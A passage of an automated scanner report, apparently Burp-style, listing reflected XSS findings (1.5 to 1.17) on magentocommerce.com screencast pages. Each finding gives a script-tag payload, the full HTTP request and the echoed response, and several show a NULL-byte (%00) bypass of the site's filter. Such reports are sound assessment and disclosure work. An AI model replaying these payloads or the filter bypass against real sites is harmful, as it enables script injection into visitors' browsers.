Set-Cookie: exp_last_activity=1313176164; expires=Sat, 11-Aug-2012 15:09:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:24 GMT
Content-Length: 33316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/adding-related-products/view?%002f335"><script>alert(1)</script>878d14e3ada=1">
...[SNIP]...

1.5. http://www.magentocommerce.com/media/screencasts/community-groups/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b28a6"><script>alert(1)</script>1f29963ffb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/community-groupsb28a6"><script>alert(1)</script>1f29963ffb4/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176258; expires=Sat, 11-Aug-2012 15:10:58 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:59 GMT
Content-Length: 33499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/community-groupsb28a6"><script>alert(1)</script>1f29963ffb4/view">
...[SNIP]...

1.6. http://www.magentocommerce.com/media/screencasts/community-groups/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c9b19"><script>alert(1)</script>7b124583d27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9b19"><script>alert(1)</script>7b124583d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/community-groups/view?%00c9b19"><script>alert(1)</script>7b124583d27=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176142; expires=Sat, 11-Aug-2012 15:09:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:03 GMT
Content-Length: 33324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/community-groups/view?%00c9b19"><script>alert(1)</script>7b124583d27=1">
...[SNIP]...

1.7. http://www.magentocommerce.com/media/screencasts/configurable-products/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b771"><script>alert(1)</script>18575fd053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/configurable-products7b771"><script>alert(1)</script>18575fd053/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176335; expires=Sat, 11-Aug-2012 15:12:15 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 33503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configurable-products7b771"><script>alert(1)</script>18575fd053/view">
...[SNIP]...

1.8. http://www.magentocommerce.com/media/screencasts/configurable-products/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006cebb"><script>alert(1)</script>57e160a161a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cebb"><script>alert(1)</script>57e160a161a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/configurable-products/view?%006cebb"><script>alert(1)</script>57e160a161a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176205; expires=Sat, 11-Aug-2012 15:10:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:05 GMT
Content-Length: 35307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configurable-products/view?%006cebb"><script>alert(1)</script>57e160a161a=1">
...[SNIP]...

1.9. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93130"><script>alert(1)</script>0ed12d6b331 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/configuring-tier-pricing93130"><script>alert(1)</script>0ed12d6b331/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176299; expires=Sat, 11-Aug-2012 15:11:39 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:40 GMT
Content-Length: 33507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing93130"><script>alert(1)</script>0ed12d6b331/view">
...[SNIP]...

1.10. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a8382"><script>alert(1)</script>ed448912710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8382"><script>alert(1)</script>ed448912710 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/configuring-tier-pricing/view?%00a8382"><script>alert(1)</script>ed448912710=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176244; expires=Sat, 11-Aug-2012 15:10:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:45 GMT
Content-Length: 34980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view?%00a8382"><script>alert(1)</script>ed448912710=1">
...[SNIP]...

1.11. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a63b5"><script>alert(1)</script>03d6ebc65f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/content-staging-and-merginga63b5"><script>alert(1)</script>03d6ebc65f7/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176212; expires=Sat, 11-Aug-2012 15:10:12 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:12 GMT
Content-Length: 33510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/content-staging-and-merginga63b5"><script>alert(1)</script>03d6ebc65f7/view">
...[SNIP]...

1.12. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e6627"><script>alert(1)</script>315df2cd626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6627"><script>alert(1)</script>315df2cd626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/content-staging-and-merging/view?%00e6627"><script>alert(1)</script>315df2cd626=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176146; expires=Sat, 11-Aug-2012 15:09:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:06 GMT
Content-Length: 33338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view?%00e6627"><script>alert(1)</script>315df2cd626=1">
...[SNIP]...

1.13. http://www.magentocommerce.com/media/screencasts/currency/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4254"><script>alert(1)</script>d10612e3d58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/currencye4254"><script>alert(1)</script>d10612e3d58/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176217; expires=Sat, 11-Aug-2012 15:10:17 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:17 GMT
Content-Length: 33491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/currencye4254"><script>alert(1)</script>d10612e3d58/view">
...[SNIP]...

1.14. http://www.magentocommerce.com/media/screencasts/currency/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e247"><script>alert(1)</script>4e616fa203b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e247"><script>alert(1)</script>4e616fa203b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/currency/view?%002e247"><script>alert(1)</script>4e616fa203b=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176142; expires=Sat, 11-Aug-2012 15:09:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:02 GMT
Content-Length: 34921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/currency/view?%002e247"><script>alert(1)</script>4e616fa203b=1">
...[SNIP]...

1.15. http://www.magentocommerce.com/media/screencasts/data-exporting/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7228e"><script>alert(1)</script>5efecb7ffae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/data-exporting7228e"><script>alert(1)</script>5efecb7ffae/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176231; expires=Sat, 11-Aug-2012 15:10:31 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:32 GMT
Content-Length: 33497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/data-exporting7228e"><script>alert(1)</script>5efecb7ffae/view">
...[SNIP]...

1.16. http://www.magentocommerce.com/media/screencasts/data-exporting/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b23ed"><script>alert(1)</script>58665ad958a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b23ed"><script>alert(1)</script>58665ad958a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/data-exporting/view?%00b23ed"><script>alert(1)</script>58665ad958a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176144; expires=Sat, 11-Aug-2012 15:09:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:05 GMT
Content-Length: 34694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/data-exporting/view?%00b23ed"><script>alert(1)</script>58665ad958a=1">
...[SNIP]...

1.17. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ebd"><script>alert(1)</script>0b0eb7b22d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/designers-guide-1f4ebd"><script>alert(1)</script>0b0eb7b22d1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176226; expires=Sat, 11-Aug-2012 15:10:26 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:27 GMT
Content-Length: 33500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
